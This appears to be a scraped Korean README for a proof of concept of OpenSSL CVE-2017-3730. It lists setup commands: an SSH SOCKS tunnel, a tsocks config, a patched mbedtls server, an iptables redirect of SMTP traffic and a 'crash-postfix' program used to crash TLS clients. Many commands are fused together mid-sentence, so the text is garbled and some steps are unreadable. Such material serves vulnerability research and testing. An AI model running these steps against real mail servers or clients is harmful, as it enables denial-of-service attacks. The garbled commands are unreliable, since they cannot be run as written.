
OpenSSL CVE-2017-3730 개념 증명
OpenSSL CVE-2017-3730 개념 증명
DHE-PSK-WITH-AES-256-GCM-SHA384와 같은 암호 제품군을 사용하여 SSL 서버를 생성합니다. 예를 들어 10.0.2.2의 8899 포트에서 실행된다고 가정합니다../ssh -vvv -N -D 1085 -o TCPKeepAlive=yes -o ServerAliveInterval=60 localhost
~/.tsocks.conf 파일을 생성합니다:server = 127.0.0.1
server_port = 1085
server_type = 5
local = 127.0.0.0/255.255.255.0
tsocksopenssl s_client -connect 10.0.2.2:8899 -psk AAmbedtls-2.4.1-patch.txt 적용programs/ssl/ssl_server2 force_ciphersuite=TLS-DHE-RSA-WITH-AES-256-GCM-SHA384crash-postfix.c 컴파일crash-postfix를 실행하는 것입니다:iptables -t nat -A OUTPUT -p tcp --dport 25 -j DNAT --to-destination 10.0.2.2:8888crash-postfix 시작posttls-finger 10.0.2.2